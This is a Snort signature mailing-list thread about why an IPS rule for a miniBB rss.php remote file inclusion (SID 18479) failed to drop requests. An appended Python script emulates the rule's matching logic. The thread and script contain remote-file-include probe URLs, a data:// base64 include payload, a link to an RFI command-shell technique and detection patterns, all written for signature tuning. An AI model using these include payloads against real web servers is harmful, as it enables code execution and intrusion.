
List:       snort-sigs
Subject:    Re: [Snort-sigs] IPS packet reject handling doesn't work as expected
From:       Jamie Riden <jamie.riden () gmail ! com>
Date:       2013-01-26 22:54:07
Message-ID: CAHno4i8uHrPUhNUuCmZyiS2ZhUGg_xq=QcucRxx4kCi1z0-JAQ () mail ! gmail ! com

As an aside, I think this (and similar sigs) should be extended to
cover the data: URI case, e.g.
pathToFiles=data://text/plain;base64,SSBsb3Z..

I've tested data: URIs as file include targets and they seem to work
ok if you have the appropriate allow_url_ setting.

cf: http://www.idontplaydarts.com/2011/03/php-remote-file-inclusion-command-shell-using-data-stream/

cheers,
 Jamie

On 25 January 2013 18:00, Lukas Matt <lukas.matt@sophos.com> wrote:
> Hello @all,
>
> I have the following setup:
>
> DNAT rule to make an internal webserver reachable by using the external IP
> address.
>
> command from client to server:
> curl -v -s 'http://[hostname]/rss.php?pathToFiles=https'
>
> triggered rule:
> 2931/finished_pullpork_rules/plain.rules:alert tcp $EXTERNAL_NET any ->
> $HOME_NET $HTTP_PORTS (msg:"SERVER-WEBAPP miniBB rss.php pathToFiles remote
> file include attempt"; flow:to_server,established; content:"rss.php";
> nocase; http_uri; content:"pathToFiles="; nocase; http_uri;
> pcre:"/pathToFiles=(ftp|https?)/Ui"; metadata:policy security-ips drop,
> service http; reference:url,osvdb.org/show/osvdb/51460;
> classtype:web-application-attack; sid:18479; rev:7;)
>
> So from my view the incoming GET request from my IP should be rejected (or
> maybe dropped).
> But in the tcpdump I can see that this GET request is routed to the internal
> webserver.
>
> It worked fine after I removed the perl regex from the rule and the
> content-modifier http_uri.
>
> What exactly could be wrong with the regex/modifier?
>
> Regards,
> Lukas Matt

-- 
Jamie Riden / jamie@honeynet.org / jamie.riden@gmail.com
http://uk.linkedin.com/in/jamieriden
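Added example, not from the thread or from the Snort rule set: a small Python emulation of the URI checks in SID 18479, run over constructed request lines. It shows how the two nocase content matches and the U-flagged pcre behave against a normalized (percent-decoded) URI, and why the data: wrapper mentioned above slips past the original `(ftp|https?)` alternation. The simplified normalization and the extended pattern are assumptions, not an official rule revision.

```python
import re
from urllib.parse import unquote

# Content matches from SID 18479: both "nocase", both limited to the URI buffer.
CONTENT_MATCHES = ("rss.php", "pathtofiles=")

# The rule's pcre as posted: /pathToFiles=(ftp|https?)/Ui
# U = match against the normalized URI buffer, i = case-insensitive.
PCRE_ORIGINAL = re.compile(r"pathToFiles=(ftp|https?)", re.IGNORECASE)

# Hypothetical extension covering the data: stream wrapper (an assumption here).
PCRE_EXTENDED = re.compile(r"pathToFiles=(ftp|https?|data)", re.IGNORECASE)


def normalized_uri(request_line: str) -> str:
    """Return the percent-decoded URI from 'GET /x HTTP/1.1'.

    Stand-in for Snort's http_inspect URI normalization; it only handles
    percent-decoding, which is enough to show why the U modifier matters.
    """
    parts = request_line.split()
    return unquote(parts[1]) if len(parts) >= 2 else ""


def rule_matches(request_line: str, pcre: re.Pattern = PCRE_ORIGINAL) -> bool:
    """Emulate the rule's detection options against a single request line."""
    uri = normalized_uri(request_line)
    lowered = uri.lower()
    # Both content matches must hit before the pcre is evaluated.
    if not all(token in lowered for token in CONTENT_MATCHES):
        return False
    return pcre.search(uri) is not None


# Constructed sample request lines (not captured traffic).
SAMPLES = [
    "GET /rss.php?pathToFiles=https://203.0.113.5/inc.txt? HTTP/1.1",
    "GET /rss.php?pathToFiles=https HTTP/1.1",  # the curl test from the thread
    "GET /RSS.PHP?PATHTOFILES=FTP://x HTTP/1.1",  # case variation, nocase/i handle it
    "GET /rss.php?pathToFiles=%68ttp://x HTTP/1.1",  # percent-encoded, needs normalization
    "GET /rss.php?pathToFiles=data://text/plain;base64,SSBsb3Z HTTP/1.1",  # data: wrapper
    "GET /rss.php?pathToFiles=./templates HTTP/1.1",  # benign local include
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(f"orig={rule_matches(line)!s:5} ext={rule_matches(line, PCRE_EXTENDED)!s:5} {line}")
```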
